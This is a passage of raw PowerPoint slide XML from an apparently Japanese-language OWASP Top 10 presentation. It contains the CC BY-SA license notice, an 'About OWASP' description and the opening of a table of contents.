                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>伝達</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105513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491512065"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="8643411"/>
          <a:ext cx="6858000" cy="126258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8517">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Copyright and License</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt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240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This document is released under the Creative Commons Attribution Share-Alike 4.0 license. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>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For any reuse or distribution, you must make it clear to others the license terms of this work.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1371600"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1" y="9232385"/>
            <a:ext cx="968784" cy="367200"/>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423613897"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="3352800" cy="7703810"/>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7711">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1600" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Meiryo" charset="-128"/>
                          <a:ea typeface="Meiryo" charset="-128"/>
                          <a:cs typeface="Meiryo" charset="-128"/>
                        </a:rPr>
                        <a:t>目次</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Meiryo" charset="-128"/>
                        <a:ea typeface="Meiryo" charset="-128"/>
                        <a:cs typeface="Meiryo" charset="-128"/>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366099">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lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF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37795896"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="939600"/>
          <a:ext cx="3429000" cy="7703810"/>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7722">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1600" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>について</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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366088">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The Open Web Application Security Project (OWASP/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>日本語</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>オワスプ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>は、オープンなコミュニティであり、組織がアプリケーションや</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>を開発、調達、メンテナンスするにあたりそれらが信頼できるようになることに専念しています。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>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には、自由でオープンなものがあります</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a: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アプリケーションセキュリティのためのツールと標準</a:t>
                      </a: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アプリケーションセキュリティテスト、セキュアなコード開発、セキュアなコードレビューについての一揃いの文献</a:t>
                      </a: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プレゼンテーションや</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>ビデオ</a:t>
                      </a:r>
                      <a:endParaRPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRP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開発者に共通なさまざまなトピックを扱った</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>チートシート</a:t>
                      </a:r>
                      <a:endParaRPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRP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標準的なセキュリティコントロールとライブラリ</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>世界中にあるローカルチャプタ</a:t>
                      </a:r>
                      <a:endParaRPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRP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先端的な調査研究</a:t>
                      </a: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多方面にわたる </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>世界中のコンファレンス</a:t>
                      </a:r>
                      <a:endParaRPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>メーリングリスト</a:t>
                      </a:r>
                      <a:endParaRPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:br>
                        <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>さらに多くの情報はこちら</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>すべての</a:t>
                      </a:r>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のツール、ドキュメント、ビデオ、プレゼンテーション、そしてチャプターは自由でオープンなものであり、アプリケーションセキュリティを改善する人なら誰でも活用することができます。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>わたしたちはアプリケーションセキュリティを、人、プロセス、および技術の問題として提唱しています。最も効果的なアプリケーションセキュリティへのアプローチはそれらの領域を改善することが必要だからです。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>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は新しいタイプの組織です。商業的な圧力に縛られないという自由は、アプリケーションセキュリティに関する、偏りのない、実用的な、かつ費用対効果の高い情報を提供することを可能にするからです。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>商用のセキュリティ技術について、よく理解した上で利用することには賛同しますが、</a:t>
                      </a:r>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は、いかなるテクノロジ企業とも提携しません。</a:t>
                      </a:r>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は、さまざまな種類の資料を共同で、透明で、オープンな方法で制作します。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>The OWASP Foundation(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>オワスプ・ファウンデーション</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>は、プロジェクトの長期的な成功を実現する非営利団体です。</a:t>
                      </a:r>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に関わるほとんどの人すなわち</a:t>
                      </a:r>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ボード、チャプターリーダー、プロジェクトリーダー、プロジェクトメンバーはボランティアです。私たちは、革新的なセキュリティリサーチに対しては、金銭面とインフラストラクチャを提供することによってサポートします。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>どうぞ、ご参加ください。</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TOC</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Meiryo" charset="-128"/>
                <a:ea typeface="Meiryo" charset="-128"/>
                <a:cs typeface="Meiryo" charset="-128"/>
              </a:rPr>
              <a:t>目次</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="553654124"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1622630"/>
          <a:ext cx="3383280" cy="6110315"/>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TOC</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OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" alt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について</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FW</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ja-JP" alt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前書き</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ja-JP" alt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導入</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RN</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ja-JP" alt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リリースノート</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ja-JP" alt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アプリケーションセキュリティリスク</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5227">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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>T10</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0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-	OWASP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Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>アプリケーション</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 　 　 　 　 セキュリティリスク </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
